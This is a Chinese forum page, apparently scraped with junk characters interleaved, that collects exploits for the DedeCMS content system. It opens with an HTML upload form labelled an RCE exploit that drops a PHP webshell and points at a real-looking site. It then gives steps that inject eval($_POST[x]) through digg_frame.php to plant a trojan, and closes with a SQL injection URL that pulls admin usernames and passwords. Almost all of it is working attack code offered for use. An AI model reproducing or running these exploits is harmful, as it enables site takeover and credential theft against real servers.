织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
' m( K: g3 l2 o: A# q' o<html> M7 N1 j! }& F7 u
<head>2 v6 P- ^# \& [ D, i
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
; c3 e& y9 w: V" G% j0 z</head>* T1 v2 }+ ?1 P! [+ x( Q
<body style="FONT-SIZE: 9pt">
) y9 r$ [' ]+ b! q! m. Y y---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
* d% L9 f# l5 u1 t3 N* N<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
. |7 |! M) T3 F$ C; h. F/ d% L<input type='hidden' name='activepath' value='/data/cache/' />
$ _# q+ C9 k: L9 c. v; V0 z# E<input type='hidden' name='cfg_basedir' value='../../' />+ ^3 s; c0 l! V
<input type='hidden' name='cfg_imgtype' value='php' />0 q! n+ o# U3 T9 E
<input type='hidden' name='cfg_not_allowall' value='txt' />
7 m4 f+ @/ L( S; L<input type='hidden' name='cfg_softtype' value='php' />
. X0 M" ?3 ?) f- o/ W1 g4 I o1 B8 [! X<input type='hidden' name='cfg_mediatype' value='php' />
+ o: t5 N' b( D& V! i<input type='hidden' name='f' value='form1.enclosure' />
& s: t. S+ Q/ X. u) d<input type='hidden' name='job' value='upload' />/ w8 \5 l9 a3 w, ]4 r, y
<input type='hidden' name='newname' value='fly.php' />
# Y: b( T) a, F( xSelect U Shell <input type='file' name='uploadfile' size='25' />
. c. W d9 L; q3 k& P% k, O<input type='submit' name='sb1' value='确定' />; t/ Z, a* K/ l1 M: b K6 t, P
</form>0 N! ~3 h3 `4 n/ n7 `9 {
<br />It's just a exp for the bug of Dedecms V55...<br />
' W7 y8 {( Z- x$ U+ t- BNeed register_globals = on...<br />* }" W$ H0 ]" A; N/ p
Fun the game,get a webshell at /data/cache/fly.php...<br />
. e& ]1 B0 X# x' \</body>+ m: I* B8 a/ `, A0 r
</html>9 s$ v8 ~" l, z; @( |9 K0 v8 O
' `( |7 |6 C8 \; I! e- U2 X
7 b+ }' n& z* n2 d
/ Q* q6 Y+ h7 C0 G9 z6 d' ^ K7 x0 g; h; M
1 x; `9 u7 z4 r3 v7 ` S7 h
: j& e( r% w( P; n. x' e8 R) N' D0 F# F7 g: N1 X6 [ l* i
' `8 c% L3 c# @7 K1 O
t3 y+ s2 Y. T+ ^- X6 s. X$ S+ J2 ^, U. S: D
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
9 N9 L7 ?7 e( d0 Q: t( s, H, T利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。1 U+ W5 l& |: i; @$ ^
1. 访问网址:/ `8 T( O4 ~, C0 ~2 S) H
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>" L! z& o" |4 d+ b7 F
可看见错误信息
. }2 D& q( \3 ?7 f' x5 w# e' K! g! n3 E; v! j' b6 C
5 D( Q- ?, R+ D9 \+ x
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。 M: _% y; `- Y( k1 r# e
int(3) Error: Illegal double '1024e1024' value found during parsing
/ {* j4 p1 F0 [Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
$ H; y8 V" Z3 v- r# q7 E* g! U& e! L9 T1 c, C, O( t
8 J6 A: }# Q* `% m) d$ ?0 M2 ^3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
' w/ r7 w' ?. {$ [5 i, a2 N( C$ L4 c( W, a- f1 E
" {2 i) }# @0 d* K7 d6 k% H2 \" E
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>+ r% i1 t$ Q6 C8 I
. L, ` d7 N+ Z7 u# Q* S5 ]5 j; L" ~- [3 t F
按确定后的看到第2步骤的信息表示文件木马上传成功.
4 ^( b6 L b& C: P9 n# I: H) Y I" Y/ q0 @7 i* O
& {) K) \6 n' ~" H- b& e* C
( d& O- l7 ?8 m0 j3 M8 W+ K
0 N9 i3 [ Z: M
$ d- R) ]. F% }" [. b2 z7 G7 G& o+ m& [" M* f
2 u5 A9 f) Y; c' Z8 w
4 q7 q; K0 P+ V
$ U# I9 W! C2 c+ ^/ }" h3 j5 j* e2 P' X$ D' ]0 w
2 h7 [2 ]" Z+ \) r/ f# m
. y6 _; c S3 u9 S3 Z; t织梦(DedeCms)plus/infosearch.php 文件注入漏洞! P- `2 c. S4 u9 t# v
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|